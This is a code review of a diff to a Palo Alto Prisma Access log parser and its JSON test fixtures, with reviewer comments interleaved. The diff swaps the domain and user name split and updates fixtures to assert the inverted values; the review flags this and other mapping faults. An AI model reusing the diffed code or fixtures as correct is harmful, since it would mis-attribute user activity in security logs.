+ tls.server.x509.issuer.common_name: "{{parsed_event.message.IssuerCommonName}}"
+ tls.server.x509.subject.common_name: "{{parsed_event.message.SubjectCommonName}}"
+ tls.server.x509.serial_number: "{{parsed_event.message.CertificateSerialNumber}}"
+ tls.server.hash.sha256: "{{parsed_event.message.Fingerprint}}"
 observer.egress.interface.alias: "{{parsed_event.message.ToZone or parsed_event.message.cs5}}"
 observer.ingress.interface.alias: "{{parsed_event.message.FromZone or parsed_event.message.cs4}}"
 observer.ingress.interface.name: "{{parsed_description.message.intf}}"
@@ -602,7 +770,7 @@ stages:
 observer.version: "{{parsed_event.message.DeviceVersion or parsed_event.message.GlobalProtectClientVersion}}"
 observer.serial_number: "{{parsed_event.message.DeviceSN}}"
 observer.name: "{{parsed_event.message.DeviceName}}"
- rule.name: "{{parsed_event.message.Rule}}"
+ rule.name: "{{parsed_event.message.Rule or parsed_event.message.HipMatchName}}"
 rule.uuid: "{{parsed_event.message.PanOSRuleUUID or parsed_event.message.RuleUUID}}"
 source.bytes: "{{parsed_event.message.BytesSent or parsed_event.message.in}}"
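Review bot: `tls.cipher` reads `parsed_event.message.message.TLS_AUTH` (doubled `.message`), and the JSON variant of the log names that field `TLSAuth` (see the test_decryption_json.json input) while the CSV column is `TLS_AUTH`, so the auth component can never resolve; consistent with that, neither decryption fixture's expected output contains `tls.cipher` although both inputs carry `ECDHE`/`AES_256_GCM`/`SHA384`. The same JSON/CSV name split affects the x509 fields: the JSON log uses `CertificateSerial`, `CommonName` and `IssuerCommonName` where this mapping reads `CertificateSerialNumber` and `SubjectCommonName`, and the CSV list declares `IssuerSubjectCommonName`, which is why the JSON fixture ends up with only `tls.server.x509.issuer.common_name` despite the input holding a subject CN and serial. Note also that `TLS_<kx>_<enc>_<auth>` is not an IANA cipher-suite name (PAN-OS does not log the signature algorithm, and TLS 1.3 suites carry no key-exchange token), so ECS consumers matching `tls.cipher` against standard names will never hit; keeping the three components under `paloalto.tls.*` or documenting the synthetic format in fields.yml is safer. I cannot see which template engine evaluates `TLSVersion[3:]`, so whether slicing an absent field is tolerated on non-decryption events is worth confirming. Proposed mapping below; the enclosing `set` block continues outside the hunk.

```yaml
# … unchanged: network.* mappings …
tls.version: "{{parsed_event.message.TLSVersion[3:]}}"
tls.cipher: "TLS_{{parsed_event.message.TLSKeyExchange}}_{{parsed_event.message.TLSEncryptionAlgorithm}}_{{parsed_event.message.TLS_AUTH or parsed_event.message.TLSAuth}}"
tls.curve: "{{parsed_event.message.EllipticCurve}}"
tls.server.x509.issuer.common_name: "{{parsed_event.message.IssuerCommonName or parsed_event.message.IssuerSubjectCommonName}}"
tls.server.x509.subject.common_name: "{{parsed_event.message.SubjectCommonName or parsed_event.message.CommonName}}"
tls.server.x509.serial_number: "{{parsed_event.message.CertificateSerialNumber or parsed_event.message.CertificateSerial}}"
tls.server.hash.sha256: "{{parsed_event.message.Fingerprint}}"
# … unchanged: observer.* mappings …
```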
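Review bot: Folding `HipMatchName` into `rule.name` makes a HIP profile/object name (`VPN Compliant` in the hipmatch fixtures) indistinguishable from a security-policy rule name, so content that filters or aggregates on `rule.name` for policy hits will now also count posture matches. If the HIP name is wanted in ECS, `rule.name` is defensible only with `event.dataset` or `rule.category` used alongside it to disambiguate; otherwise a dedicated field such as `paloalto.hip.match_name: "{{parsed_event.message.HipMatchName}}"` (with a fields.yml entry) keeps the policy semantics of `rule.name` intact. The `set` block continues outside the hunk.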
@@ -766,6 +934,9 @@ stages:
 paloalto.endpoint.serial_number: "{{parsed_event.message.EndpointSerialNumber or parsed_event.message.PanOSEndpointSerialNumber}}"
 paloalto.threat.id: "{{parsed_event.message.ThreatID or parsed_event.message.PanOSThreatID or parsed_threat.message.threat_code}}"
 paloalto.threat.name: "{{parsed_threat.message.threat_description}}"
+ paloalto.tls.chain_status: "{{parsed_event.message.ChainStatus}}"
+ paloalto.tls.root_status: "{{parsed_event.message.RootStatus}}"
+ paloalto.tls.sni: "{{parsed_event.message.ServerNameIndication}}"
 - set:
 source.user.name: "{{parsed_event.message.SourceUser}}"
 user.name: "{{parsed_event.message.SourceUser}}"
@@ -798,8 +969,8 @@ stages:
 set_finalize_user_name:
 actions:
 - set:
- user.domain: '{{final.user.name.split("\\") | first}}'
- user.name: '{{final.user.name.split("\\") | last}}'
+ user.domain: '{{final.user.name.split("\\") | last}}'
+ user.name: '{{final.user.name.split("\\") | first}}'
 filter: '{{final.user.name != null and "\\" in final.user.name}}'
 - set:
 user.domain: '{{final.user.email.split("@") | first}}'
diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/decryption_cef.json b/Palo Alto Networks/paloalto-prisma-access/tests/decryption_cef.json
index 1a4fba4b4..b32ea4d13 100644
--- a/Palo Alto Networks/paloalto-prisma-access/tests/decryption_cef.json
+++ b/Palo Alto Networks/paloalto-prisma-access/tests/decryption_cef.json
@@ -69,6 +69,7 @@
 "1.1.1.1"
 ],
 "user": [
+ "paloaltonetwork",
 "xxxxx"
 ]
 },
@@ -90,8 +91,8 @@
 }
 },
 "user": {
- "domain": "paloaltonetwork",
- "name": "xxxxx"
+ "domain": "xxxxx",
+ "name": "paloaltonetwork"
 }
 }
 }
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/fix_bug_with_int.json b/Palo Alto Networks/paloalto-prisma-access/tests/fix_bug_with_int.json
index 512ae89e7..37c8000b9 100644
--- a/Palo Alto Networks/paloalto-prisma-access/tests/fix_bug_with_int.json
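Review bot: Swapping `first`/`last` in `set_finalize_user_name` inverts the down-level logon split: PAN-OS and Windows emit `DOMAIN\user`, so after this change `example\jdoe` becomes `user.domain: jdoe`, `user.name: example`, which is exactly what the updated prisma-access fixtures now assert (test_decryption_json.json has `source.user.domain: example` / `source.user.name: jdoe` next to `user.domain: jdoe` / `user.name: example` for the same event; fix_bug_with_int.json puts the literal placeholder `domain` into `user.name`; test_globalprotect.json yields `user.name: test.fr`). Detections and entity pivots keyed on `user.name` will silently attribute activity to domain names, and `related.user` gains domains as users. Unless Prisma Access is known to emit `user\domain` (none of the samples here do), the original `user.domain: '{{final.user.name.split("\\") | first}}'` / `user.name: '{{final.user.name.split("\\") | last}}'` should stay and the fixture updates be reverted; the ngfw fixtures in this same change move in the correct direction. The unchanged email branch just below, `user.domain: '{{final.user.email.split("@") | first}}'`, also looks inverted (that takes the local part as the domain) and is likely what the fixture churn was trying to compensate for; fixing it to `| last` with the matching `user.name: ... | first` is the change that makes the wildfire/file-alert expectations hold.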
+++ b/Palo Alto Networks/paloalto-prisma-access/tests/fix_bug_with_int.json
@@ -62,6 +62,7 @@
 "5.6.7.8"
 ],
 "user": [
+ "domain",
 "pusername",
 "userdest"
 ]
@@ -86,8 +87,8 @@
 }
 },
 "user": {
- "domain": "domain",
- "name": "pusername"
+ "domain": "pusername",
+ "name": "domain"
 }
 }
 }
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv.json b/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv.json
index 65f2b6940..127226ee3 100644
--- a/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv.json
+++ b/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv.json
@@ -21,6 +21,7 @@
 "type": "0"
 },
 "host": {
+ "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeee",
 "name": "AAAABBBBB",
 "os": {
 "version": "Microsoft Windows 10 Pro , 64-bit"
diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json b/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json
index e4b1d5fab..e51f19fbb 100644
--- a/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json
+++ b/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json
@@ -21,6 +21,7 @@
 "type": "0"
 },
 "host": {
+ "id": "8f0fd1d3-5d3b-49c3-9bee-247ff89a52f3",
 "name": "2021-02707",
 "os": {
 "version": "Microsoft Windows 10 Enterprise , 64-bit"
@@ -46,6 +47,7 @@
 "88.120.236.74"
 ],
 "user": [
+ "example.org",
 "test"
 ]
 },
@@ -61,8 +63,8 @@
 }
 },
 "user": {
- "domain": "example.org",
- "name": "test"
+ "domain": "test",
+ "name": "example.org"
 },
 "user_agent": {
 "os": {
diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_csv.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_csv.json
new file mode 100644
index 000000000..8a060536e
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_csv.json
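Review bot: This fixture update locks in an inverted user split: the expected `user.name` becomes the literal placeholder `"domain"` and `user.domain` becomes `"pusername"`, and `related.user` now lists `"domain"` as a user. A test that asserts the wrong attribution is worse than no test, because it will make the eventual fix look like a regression; if the parser swap is reverted this hunk should be dropped rather than kept as the baseline, and the same applies to the `"domain": "test"` / `"name": "example.org"` expectation in globalprotect_csv_2.json.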
@@ -0,0 +1,98 @@ +{ + "input": { + "message": "1,2024/11/03 19:09:43,111111111111,DECRYPTION,0,2562,2024/11/03 19:09:43,1.2.3.4,5.6.7.8,4.3.2.1,8.7.6.5,URL Filtering - Chrome Profile,jdoe,,ssl,vsys1,VPN-SSL,INTERNET,tunnel.16,ae2.1111,Forward-Syslog,2024/11/03 19:09:43,2020391,1,55107,443,22814,443,0x400400,tcp,allow,N/A,,,,,25185364-4f1b-46b5-a376-a96a9438d665,Unknown,Unknown,TLS1.3,ECDHE,AES_256_GCM,SHA384,NoDecrypt-rule,,None,uninspected,Uninspected,No Decrypt,,,,,V1,0,0,0,0,0,:::::NONE,,,,,,,,,,,,,2024-11-03T19:09:43.654+01:00,,,,,,,,,,,,,,,,,1111111111111111111,0x8000000000000000,53,0,0,0,,NFW-OUT-DCA,1,encrypted-tunnel,networking,browser-based,4,\"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use\",,ssl,no,no\n", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto Prisma access", + "dialect_uuid": "ea265b9d-fb48-4e92-9c26-dcfbf937b630" + } + } + }, + "expected": { + "message": "1,2024/11/03 19:09:43,111111111111,DECRYPTION,0,2562,2024/11/03 19:09:43,1.2.3.4,5.6.7.8,4.3.2.1,8.7.6.5,URL Filtering - Chrome Profile,jdoe,,ssl,vsys1,VPN-SSL,INTERNET,tunnel.16,ae2.1111,Forward-Syslog,2024/11/03 19:09:43,2020391,1,55107,443,22814,443,0x400400,tcp,allow,N/A,,,,,25185364-4f1b-46b5-a376-a96a9438d665,Unknown,Unknown,TLS1.3,ECDHE,AES_256_GCM,SHA384,NoDecrypt-rule,,None,uninspected,Uninspected,No Decrypt,,,,,V1,0,0,0,0,0,:::::NONE,,,,,,,,,,,,,2024-11-03T19:09:43.654+01:00,,,,,,,,,,,,,,,,,1111111111111111111,0x8000000000000000,53,0,0,0,,NFW-OUT-DCA,1,encrypted-tunnel,networking,browser-based,4,\"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use\",,ssl,no,no\n", + "event": { + "action": "allow", + "category": [ + "network" + ], + "dataset": "decryption", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-03T19:09:43Z", + "action": { + "name": "allow", + "outcome": "success", + "type": "0" + }, + "destination": { + "address": "5.6.7.8", + "ip": 
"5.6.7.8", + "nat": { + "ip": "8.7.6.5", + "port": 443 + }, + "port": 443 + }, + "log": { + "hostname": "NFW-OUT-DCA", + "logger": "decryption" + }, + "network": { + "application": "ssl", + "transport": "tcp" + }, + "observer": { + "name": "NFW-OUT-DCA", + "product": "PAN-OS", + "serial_number": "111111111111" + }, + "paloalto": { + "DGHierarchyLevel1": "53", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "0", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1", + "tls": { + "chain_status": "Uninspected", + "root_status": "uninspected" + } + }, + "related": { + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "8.7.6.5" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "URL Filtering - Chrome Profile" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "nat": { + "ip": "4.3.2.1", + "port": 22814 + }, + "port": 55107, + "user": { + "name": "jdoe" + } + }, + "tls": { + "version": "1.3" + }, + "user": { + "name": "jdoe" + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_json.json new file mode 100644 index 000000000..35fa4abec --- /dev/null +++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_json.json 
@@ -0,0 +1,119 @@ +{ + "input": { + "message": "{\"TimeReceived\":\"2024-11-20T16:40:01.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"DECRYPTION\",\"Subtype\":\"start\",\"SubType\":\"start\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:39:51.000000Z\",\"SourceAddress\":\"1.2.3.4\",\"DestinationAddress\":\"5.6.7.8\",\"NATSource\":\"4.3.2.1\",\"NATDestination\":\"8.7.6.5\",\"Rule\":\"URL Filtering - Chrome Profile\",\"SourceUser\":\"example\\\\jdoe\",\"DestinationUser\":null,\"Application\":\"incomplete\",\"VirtualLocation\":\"vsys1\",\"FromZone\":\"VPN-SSL\",\"ToZone\":\"INTERNET\",\"InboundInterface\":\"tunnel.16\",\"OutboundInterface\":\"ethernet1/1\",\"LogSetting\":\"Forward-Syslog\",\"TimeReceivedManagementPlane\":\"2024-11-20T16:39:51.000000Z\",\"SessionID\":2222222,\"RepeatCount\":1,\"CountOfRepeat\":1,\"SourcePort\":58877,\"DestinationPort\":443,\"NATSourcePort\":1042,\"NATDestinationPort\":443,\"Protocol\":\"tcp\",\"Action\":\"allow\",\"Tunnel\":\"N/A\",\"SourceUUID\":null,\"DestinationUUID\":null,\"RuleUUID\":\"eaf45b26-01ef-496c-990d-bbd1d89f2ed5\",\"ClientToFirewall\":\"Finished\",\"FirewallToClient\":\"Client_Hello\",\"TLSVersion\":\"TLS1.2\",\"TLSKeyExchange\":\"ECDHE\",\"TLSEncryptionAlgorithm\":\"AES_256_GCM\",\"TLSAuth\":\"SHA384\",\"PolicyName\":\"TLS - https inspection - default rule\",\"EllipticCurve\":\"secp256r1\",\"ErrorIndex\":\"Protocol\",\"RootStatus\":\"trusted\",\"ChainStatus\":\"Trusted\",\"ProxyType\":\"Forward\",\"CertificateSerial\":\"059125d73c34a73fca9\",\"Fingerprint\":\"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b\",\"TimeNotBefore\":1730875569,\"TimeNotAfter\":1765176368,\"CertificateVersion\":\"V3\",\"CertificateSize\":256,\"CommonNameLength\":13,\"IssuerNameLength\":29,\"RootCNLength\":10,\"SNILength\":23,\"CertificateFlags\":4,\"CommonName\":\"example.org\",\"IssuerCommonName\":\"GlobalSign ECC OV SSL CA 
2018\",\"RootCommonName\":\"GlobalSign\",\"ServerNameIndication\":\"static.files.example.org\",\"ErrorMessage\":\"General TLS protocol error. Received fatal alert DecodeError from server\",\"ContainerID\":null,\"ContainerNameSpace\":null,\"ContainerName\":null,\"SourceEDL\":null,\"DestinationEDL\":null,\"SourceDynamicAddressGroup\":null,\"DestinationDynamicAddressGroup\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:39:51.441000Z\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceHost\":null,\"SourceDeviceMac\":null,\"DestinationDeviceCategory\":null,\"DestinationDeviceProfile\":null,\"DestinationDeviceModel\":null,\"DestinationDeviceVendor\":null,\"DestinationDeviceOSFamily\":null,\"DestinationDeviceOSVersion\":null,\"DestinationDeviceHost\":null,\"DestinationDeviceMac\":null,\"SequenceNo\":1111111111111111111}\n", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto Prisma access", + "dialect_uuid": "ea265b9d-fb48-4e92-9c26-dcfbf937b630" + } + } + }, + "expected": { + "message": "{\"TimeReceived\":\"2024-11-20T16:40:01.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"DECRYPTION\",\"Subtype\":\"start\",\"SubType\":\"start\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:39:51.000000Z\",\"SourceAddress\":\"1.2.3.4\",\"DestinationAddress\":\"5.6.7.8\",\"NATSource\":\"4.3.2.1\",\"NATDestination\":\"8.7.6.5\",\"Rule\":\"URL Filtering - Chrome 
Profile\",\"SourceUser\":\"example\\\\jdoe\",\"DestinationUser\":null,\"Application\":\"incomplete\",\"VirtualLocation\":\"vsys1\",\"FromZone\":\"VPN-SSL\",\"ToZone\":\"INTERNET\",\"InboundInterface\":\"tunnel.16\",\"OutboundInterface\":\"ethernet1/1\",\"LogSetting\":\"Forward-Syslog\",\"TimeReceivedManagementPlane\":\"2024-11-20T16:39:51.000000Z\",\"SessionID\":2222222,\"RepeatCount\":1,\"CountOfRepeat\":1,\"SourcePort\":58877,\"DestinationPort\":443,\"NATSourcePort\":1042,\"NATDestinationPort\":443,\"Protocol\":\"tcp\",\"Action\":\"allow\",\"Tunnel\":\"N/A\",\"SourceUUID\":null,\"DestinationUUID\":null,\"RuleUUID\":\"eaf45b26-01ef-496c-990d-bbd1d89f2ed5\",\"ClientToFirewall\":\"Finished\",\"FirewallToClient\":\"Client_Hello\",\"TLSVersion\":\"TLS1.2\",\"TLSKeyExchange\":\"ECDHE\",\"TLSEncryptionAlgorithm\":\"AES_256_GCM\",\"TLSAuth\":\"SHA384\",\"PolicyName\":\"TLS - https inspection - default rule\",\"EllipticCurve\":\"secp256r1\",\"ErrorIndex\":\"Protocol\",\"RootStatus\":\"trusted\",\"ChainStatus\":\"Trusted\",\"ProxyType\":\"Forward\",\"CertificateSerial\":\"059125d73c34a73fca9\",\"Fingerprint\":\"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b\",\"TimeNotBefore\":1730875569,\"TimeNotAfter\":1765176368,\"CertificateVersion\":\"V3\",\"CertificateSize\":256,\"CommonNameLength\":13,\"IssuerNameLength\":29,\"RootCNLength\":10,\"SNILength\":23,\"CertificateFlags\":4,\"CommonName\":\"example.org\",\"IssuerCommonName\":\"GlobalSign ECC OV SSL CA 2018\",\"RootCommonName\":\"GlobalSign\",\"ServerNameIndication\":\"static.files.example.org\",\"ErrorMessage\":\"General TLS protocol error. 
Received fatal alert DecodeError from server\",\"ContainerID\":null,\"ContainerNameSpace\":null,\"ContainerName\":null,\"SourceEDL\":null,\"DestinationEDL\":null,\"SourceDynamicAddressGroup\":null,\"DestinationDynamicAddressGroup\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:39:51.441000Z\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceHost\":null,\"SourceDeviceMac\":null,\"DestinationDeviceCategory\":null,\"DestinationDeviceProfile\":null,\"DestinationDeviceModel\":null,\"DestinationDeviceVendor\":null,\"DestinationDeviceOSFamily\":null,\"DestinationDeviceOSVersion\":null,\"DestinationDeviceHost\":null,\"DestinationDeviceMac\":null,\"SequenceNo\":1111111111111111111}\n", + "event": { + "action": "allow", + "category": [ + "network" + ], + "dataset": "decryption", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-20T16:39:51Z", + "action": { + "name": "allow", + "outcome": "success", + "type": "start" + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "nat": { + "ip": "8.7.6.5", + "port": 443 + }, + "port": 443 + }, + "log": { + "logger": "decryption" + }, + "network": { + "application": "incomplete" + }, + "observer": { + "egress": { + "interface": { + "alias": "INTERNET" + } + }, + "ingress": { + "interface": { + "alias": "VPN-SSL" + } + }, + "product": "PAN-OS", + "serial_number": "no-serial" + }, + "paloalto": { + "Threat_ContentType": "start", + "VirtualLocation": "vsys1", + "tls": { + "chain_status": "Trusted", + "root_status": "trusted", + "sni": "static.files.example.org" + } + }, + "related": { + "hash": [ + "01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b" + ], + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "8.7.6.5" + ], + "user": [ + "example", + "jdoe" + ] + }, + "rule": { + "name": "URL Filtering - Chrome Profile", + "uuid": 
"eaf45b26-01ef-496c-990d-bbd1d89f2ed5" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "nat": { + "ip": "4.3.2.1", + "port": 1042 + }, + "port": 58877, + "user": { + "domain": "example", + "name": "jdoe" + } + }, + "tls": { + "curve": "secp256r1", + "server": { + "hash": { + "sha256": "01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b" + }, + "x509": { + "issuer": { + "common_name": "GlobalSign ECC OV SSL CA 2018" + } + } + }, + "version": "1.2" + }, + "user": { + "domain": "jdoe", + "name": "example" + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json index f08a677ef..70c31c202 100644 --- a/Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json +++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json @@ -21,6 +21,7 @@ "type": "0" }, "host": { + "id": "662f0b44-e024-4a70", "name": "2023-01724", "os": { "version": "Microsoft Windows 10 Enterprise , 64-bit" @@ -49,7 +50,8 @@ "1.2.3.4" ], "user": [ - "JDOE" + "JDOE", + "test.fr" ] }, "source": { @@ -64,8 +66,8 @@ } }, "user": { - "domain": "test.fr", - "name": "JDOE" + "domain": "JDOE", + "name": "test.fr" }, "user_agent": { "os": { diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_csv.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_csv.json new file mode 100644 index 000000000..140e7657e --- /dev/null +++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_csv.json 
@@ -0,0 +1,73 @@ +{ + "input": { + "message": "1,2024/11/03 18:50:04,026701003578,HIPMATCH,0,2817,2024/11/03 18:50:04,jdoe,vsys1,DESKTOP-01,Windows,1.2.3.4,VPN Compliant,1,profile,,,1111111111111111111,0x8000000000000000,28,99,38,0,,FW-CIV1,1,0.0.0.0,3a7393a4-997f-4e5b-b6e4-4ebff71dacf4,aefee8,,2024-11-03T18:50:04.310+01:00,\n", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto Prisma access", + "dialect_uuid": "ea265b9d-fb48-4e92-9c26-dcfbf937b630" + } + } + }, + "expected": { + "message": "1,2024/11/03 18:50:04,026701003578,HIPMATCH,0,2817,2024/11/03 18:50:04,jdoe,vsys1,DESKTOP-01,Windows,1.2.3.4,VPN Compliant,1,profile,,,1111111111111111111,0x8000000000000000,28,99,38,0,,FW-CIV1,1,0.0.0.0,3a7393a4-997f-4e5b-b6e4-4ebff71dacf4,aefee8,,2024-11-03T18:50:04.310+01:00,\n", + "event": { + "category": [ + "network" + ], + "dataset": "hipmatch", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-03T17:50:04.310000Z", + "action": { + "type": "0" + }, + "host": { + "id": "3a7393a4-997f-4e5b-b6e4-4ebff71dacf4", + "name": "DESKTOP-01" + }, + "log": { + "hostname": "FW-CIV1", + "logger": "hipmatch" + }, + "observer": { + "name": "FW-CIV1", + "product": "PAN-OS", + "serial_number": "026701003578" + }, + "paloalto": { + "DGHierarchyLevel1": "28", + "DGHierarchyLevel2": "99", + "DGHierarchyLevel3": "38", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "0", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1", + "endpoint": { + "serial_number": "aefee8" + } + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "VPN Compliant" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "user": { + "name": "jdoe" + } + }, + "user": { + "name": "jdoe" + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_json.json new file mode 100644 index 000000000..fd4e5a75f --- /dev/null 
+++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_json.json 
@@ -0,0 +1,76 @@ +{ + "input": { + "message": "{\"TimeReceived\":\"2024-11-20T16:30:32.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"HIPMATCH\",\"Subtype\":\"hipmatch\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:30:28.000000Z\",\"SourceUser\":\"jdoe@example.org\",\"VirtualLocation\":\"vsys1\",\"EndpointDeviceName\":\"DESKTOP-01\",\"EndpointOSType\":\"Windows\",\"SourceIP\":\"1.2.3.4\",\"HipMatchName\":\"VPN Compliant\",\"RepeatCount\":1,\"CountOfRepeats\":1,\"HipMatchType\":\"profile\",\"SequenceNo\":1111111111111111111,\"DGHierarchyLevel1\":12,\"DGHierarchyLevel2\":22,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":\"\",\"DeviceName\":\"FW-ALK01\",\"VirtualSystemID\":1,\"SourceIPv6\":\"\",\"HostID\":\"3a7393a4-997f-4e5b-b6e4-4ebff71dacf4\",\"EndpointSerialNumber\":\"aefee8\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceMac\":null,\"SourceDeviceHost\":null,\"Source\":null,\"TimestampDeviceIdentification\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:30:28.904000Z\"}\n", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto Prisma access", + "dialect_uuid": "ea265b9d-fb48-4e92-9c26-dcfbf937b630" + } + } + }, + "expected": { + "message": "{\"TimeReceived\":\"2024-11-20T16:30:32.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"HIPMATCH\",\"Subtype\":\"hipmatch\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:30:28.000000Z\",\"SourceUser\":\"jdoe@example.org\",\"VirtualLocation\":\"vsys1\",\"EndpointDeviceName\":\"DESKTOP-01\",\"EndpointOSType\":\"Windows\",\"SourceIP\":\"1.2.3.4\",\"HipMatchName\":\"VPN 
Compliant\",\"RepeatCount\":1,\"CountOfRepeats\":1,\"HipMatchType\":\"profile\",\"SequenceNo\":1111111111111111111,\"DGHierarchyLevel1\":12,\"DGHierarchyLevel2\":22,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":\"\",\"DeviceName\":\"FW-ALK01\",\"VirtualSystemID\":1,\"SourceIPv6\":\"\",\"HostID\":\"3a7393a4-997f-4e5b-b6e4-4ebff71dacf4\",\"EndpointSerialNumber\":\"aefee8\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceMac\":null,\"SourceDeviceHost\":null,\"Source\":null,\"TimestampDeviceIdentification\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:30:28.904000Z\"}\n", + "event": { + "category": [ + "network" + ], + "dataset": "hipmatch", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-20T16:30:28Z", + "action": { + "type": "hipmatch" + }, + "host": { + "id": "3a7393a4-997f-4e5b-b6e4-4ebff71dacf4", + "name": "DESKTOP-01" + }, + "log": { + "hostname": "FW-ALK01", + "logger": "hipmatch" + }, + "observer": { + "name": "FW-ALK01", + "product": "PAN-OS", + "serial_number": "no-serial" + }, + "paloalto": { + "DGHierarchyLevel1": "12", + "DGHierarchyLevel2": "22", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "hipmatch", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1", + "endpoint": { + "serial_number": "aefee8" + } + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "example.org", + "jdoe@example.org" + ] + }, + "rule": { + "name": "VPN Compliant" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "user": { + "name": "jdoe@example.org" + } + }, + "user": { + "domain": "jdoe", + "email": "jdoe@example.org", + "name": "example.org" + } + } +} \ No newline at end of file 
